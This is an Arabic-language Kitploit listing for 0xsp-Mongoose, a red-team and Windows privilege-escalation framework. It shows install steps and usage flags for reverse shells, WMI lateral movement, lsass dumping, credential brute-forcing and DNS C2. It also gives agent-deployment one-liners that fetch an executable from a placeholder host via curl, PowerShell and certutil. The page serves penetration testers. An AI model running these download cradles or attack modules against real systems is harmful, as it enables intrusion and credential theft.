Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
0xsp-Mongoose — إطار عمل فريد لمحاكاة الأمن السيبراني وعمليات اختبار الاختراق (red teaming)، وتدقيق ويندوز بحثًا عن الثغرات الجديدة والأخطاء التكوينية وهجمات تصعيد الامتيازات، وتكرار تكتيكات وتقنيات الخصم المتقدم في الشبكة. | Kitploit
أدوات/GitHubGitHub/zux0x3a/0xsp-mongoose
تصعيد الامتيازاتماسحات الثغرات الأمنيةتخطيط الشبكةهجمات كلمات المرورالاستغلالالحركة الجانبيةاستغلال تطبيقات الويبما بعد الاستغلالالقيادة والسيطرةالفريق الأحمرتحليل DNSArchived
5341175منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHubzux0x3a/0xsp-mongoose

0xsp-Mongoose

إطار عمل فريد لمحاكاة الأمن السيبراني وعمليات اختبار الاختراق (red teaming)، وتدقيق ويندوز بحثًا عن الثغرات الجديدة والأخطاء التكوينية وهجمات تصعيد الامتيازات، وتكرار تكتيكات وتقنيات الخصم المتقدم في الشبكة.

عرض المستودعالموقع الإلكتروني

GPLv3 license

ادعم المشروع للتطوير المستمر (ETH 0xf340c15c5e669a4ababab856e9f2bccd659d6e42)

0xsp Mongoose RED لنظام ويندوز

الإصدار الحالي 2.2.0

تم توفير إصدار 0xsp mongoose red لمساعدة احتياجاتك أثناء محاكاة الأمن السيبراني. باستخدام هذا الإصدار، ستتمكن من تدقيق نظام تشغيل ويندوز مستهدف بحثًا عن ثغرات النظام، وسوء التهيئة، وهجمات رفع الامتيازات، وإعادة إنتاج تكتيكات وتقنيات الخصم المتقدم في الشبكة.

مع دعم NodeJS لواجهة برمجة تطبيقات الويب، يصبح التثبيت والتخصيص أسهل بكثير في الوقت المناسب. سيتواصل مستشعر ويندوز مع واجهة API الخاصة بالتطبيق لنقل النتائج واستقبال الأوامر كتقنية ثنائية الاتجاه.

المستشعر قادر على تحديد واكتشاف ثغرات ويندوز باستخدام وحدات windows update api و exploit database definitions. سيتمكن الإصدار الجديد أيضًا من اكتشاف الثغرات التالية.

  • CVE-2019-0836
  • CVE-2019-0841
  • CVE-2019-1064
  • CVE-2019-1130
  • CVE-2019-1253
  • CVE-2019-1385
  • CVE-2019-1388
  • CVE-2019-1405
  • CVE-2019-1315
  • CVE-2020-0787
  • CVE-2020-0796
  • CVE-2020-0797
  • CVE-2020-1472
  • CVE-2021-1675

الميزات

  • تقنيات فحص رفع الامتيازات في ويندوز.
  • تطبيق ويب مبني باستخدام NodeJS.
  • يدعم قاعدة بيانات SQLite.
  • تقنيات الحركة الجانبية. فيديو
  • قناة اتصال ثنائية الاتجاه. فيديو
  • تغليف الإضافات عبر الإنترنت.
  • محرك برمجة محسن لاكتشاف الثغرات.
  • وحدة اختراق حسابات ويندوز (محلي / مجال).
  • تسليح دالة Windows API لتشغيل كمستخدم. فيديو
  • مسح الشبكة المحلية وتعداد المشاركات.
  • تقنية تفريغ ذاكرة lsass (إضافة).
  • وضع شل تفاعلي DNS C2C.

التثبيت

root@kitploit:~
git clone --single-branch --branch 0xsp-red https://github.com/lawrenceamer/0xsp-mongoose 
cd 0xsp-mongoose/ 
npm install 
node index.js

بيانات الاعتماد الافتراضية للوصول:

  • اسم المستخدم : admin
  • كلمة المرور : 0xsp

سكربت DNS C2C بلغة بايثون

root@kitploit:~
touch temp.txt
python3 dns_server.py -d DOMAIN -a PUBLICIP -i INTERFACEIP

النشر السريع للعميل

root@kitploit:~
#مثال 1 
curl.exe -o agent.exe http://nodejsip:4000/release/x64.exe
#مثال 2 
powershell.exe -command (new-object net.webclient).downloadfile('http://nodejsip:4000/release/x64.exe','c:\tmp\agent.exe');
#مثال 3 
certutil.exe -urlcache -split -f "http://nodejsip:4000/release/x64.exe" agent.exe

الاستخدام

root@kitploit:~
-s --استرجاع خدمات ويندوز والبرامج التشغيل المثبتة.
-u --استرجاع معلومات عن المستخدمين والمجموعات والأدوار.
-c --البحث عن برامج تشغيل متصلة لملفات تهيئة حساسة حسب الامتداد.
-n --استرجاع معلومات الشبكة وواجهات الشبكة وتفاصيل الاتصال.
-w --تعداد الأدلة القابلة للكتابة والتحقق من أذونات الوصول والأذونات المعدلة.
-i --تعداد معلومات نظام ويندوز والجلسات والتحقق من الرفع الدائم.
-l --البحث في أي ملف عن سلسلة نصية محددة، مثال: agent.exe -l c:\ password *.config.
-o --تحديد عنوان مضيف تطبيق NodeJS، يمكنك أيضًا استخدام srvhost
-p --تعداد البرامج المثبتة والعمليات الجارية والمهام.
-e --أداة فحص النواة، ستساعد في البحث من خلال قواعد بيانات الأدوات عن ثغرات نواة ويندوز.
-x --كلمة المرور لتخويل اتصالك بتطبيق NodeJS.
-d --تنزيل الملفات مباشرة إلى الجهاز المستهدف.
-t --رفع الملفات من الجهاز المستهدف إلى تطبيق NodeJS.
-spooler --مسح مضيف واحد أو قائمة من المضيفين بحثًا عن CVE-2021-1675 المحتملة (مثال: -spooler -srvhost أو -spooler -hosts )
-m --تشغيل جميع أنواع الفحص المعروفة معًا.

[!] قسم تكتيكات الفريق الأحمر

-r --إنشاء شل عكسي بحساب محدد.
-lr --تقنية الحركة الجانبية باستخدام WMI (مثال: -lr -host 192.168.14.1 -username administrator -password blabla -srvhost nodejsip )
-nds --اكتشاف الشبكة وتعداد المشاركات
-dns --إنشاء شل تفاعلي DNS C2C
-cmd --نقل الأوامر عبر HTTP Shell
-interactive --بدء الوضع التفاعلي (مثال: تحميل الإضافات ..إلخ)
-username --مصادقة الهوية لوحدات الهجوم المحددة.
-password --مصادقة الهوية لوحدات الهجوم المحددة.
-host --تحديد المضيف البعيد لتنفيذ هجوم عليه.
-srvhost --تعيين المضيف البعيد لتطبيق NodeJS.
-bf --وحدة اختراق المستخدمين المحليين / مستخدمي المجال
-import --استيراد وتنفيذ ملف DLL محليًا
-remote --استيراد وتنفيذ ملف DLL من مضيف بعيد

الوثائق

https://0xsp.com/security%20dev/0xsp-mongoose-red

موقع الأبحاث التفصيلي

https://0xsp.com

المؤتمرات الأمنية

  • Standoff365 - روسيا (https://standoff365.com/conferences/357)

دروس الأداة

تأكد من الاشتراك في القناة التالية ليصلك إشعار عند نشر دروس وحيل جديدة لـ 0xsp https://www.youtube.com/channel/UCoEr6Qsyd6oMsPmaJPQ_FOg

تنزيل الأداة